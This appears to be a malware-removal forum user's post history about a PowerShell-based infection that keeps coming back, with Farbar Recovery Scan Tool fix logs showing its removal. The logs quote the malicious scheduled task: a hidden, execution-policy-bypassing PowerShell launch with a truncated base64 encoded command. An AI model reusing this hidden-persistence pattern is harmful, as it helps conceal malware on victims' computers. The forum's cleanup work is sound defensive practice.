Jump to content

RCT_Dave

Members
  • Posts

    11
  • Joined

  • Last visited

Everything posted by RCT_Dave

  1. Aura, clean scan. Thanks so much for your assistance and patience.
  2. Fix result of Farbar Recovery Scan Tool (x64) Version: 20-08-2017 Ran by administrator (22-08-2017 13:12:06) Run:5 Running from C:\TEMP Loaded Profiles: simsts & administrator (Available Profiles: Desktop & RRVW & simsts & administrator) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: Task: {310015AE-836E-49B8-A5E1-E259F20DD947} - System32\Tasks\{7F7E0547-0E04-7F08-0911-057A7E0E1104} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9352 more characters). <==== ATTENTION Task: {3C5AF235-1CCB-4476-ADFC-9BEA8CDFCF3D} - \Sixth -> No File <==== ATTENTION EmptyTemp: ***************** Processes closed successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{310015AE-836E-49B8-A5E1-E259F20DD947} => key not found. C:\Windows\System32\Tasks\{7F7E0547-0E04-7F08-0911-057A7E0E1104} => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F7E0547-0E04-7F08-0911-057A7E0E1104} => key not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3C5AF235-1CCB-4476-ADFC-9BEA8CDFCF3D} => key not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth => key not found. =========== EmptyTemp: ========== BITS transfer queue => 0 B
  3. Will do as soon as I can get access to workstation. Likely around the lunch hour.
  4. Fix result of Farbar Recovery Scan Tool (x64) Version: 20-08-2017 Ran by administrator (21-08-2017 17:10:54) Run:3 Running from C:\TEMP Loaded Profiles: simsts & administrator (Available Profiles: Desktop & RRVW & simsts & administrator) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: Task: {310015AE-836E-49B8-A5E1-E259F20DD947} - System32\Tasks\{7F7E0547-0E04-7F08-0911-057A7E0E1104} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9352 more characters). <==== ATTENTION Task: {3C5AF235-1CCB-4476-ADFC-9BEA8CDFCF3D} - \Sixth -> No File <==== ATTENTION EmptyTemp: ***************** Processes closed successfully.
  5. When running this fix, the computer locks up every time. I've been unable to run it with success. Thoughts?
  6. No fixlist.txt after scan. Malwarebytes is scanning clean as well. Including the 2 logs from FRST scan Addition.txt FRST.txt
  7. Hey Aura, sorry. I had to leave town unexpectedly. I'll get this today and submit the results.
  8. The 2nd machine is no longer an issue as it has been take over by a co-worker. I'd like to concentrate on this one, if we could. I appreciate you seeking Business Support assistance as well. Thanks!
  9. Thanks so much for the extremely quick pickup of my issue. Our version of MalwareBytes is from the MSP and is pushed via Automate (LabTech) so I'm not sure if that matters and if there will be conflicting issues with using the free version you suggested. Please confirm that I NEED the free version before we continue.
  10. Addition.txt FRST.txt mbamlog-568.txt Have removed registry entries and quarantined several times. It scans great for 3 days and then they are back. User stated "little black window" flashes on the screen from time to time. I've not witnessed the behavior myself. We have 2 machines with identical issues. Help is sincerely appreciated.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.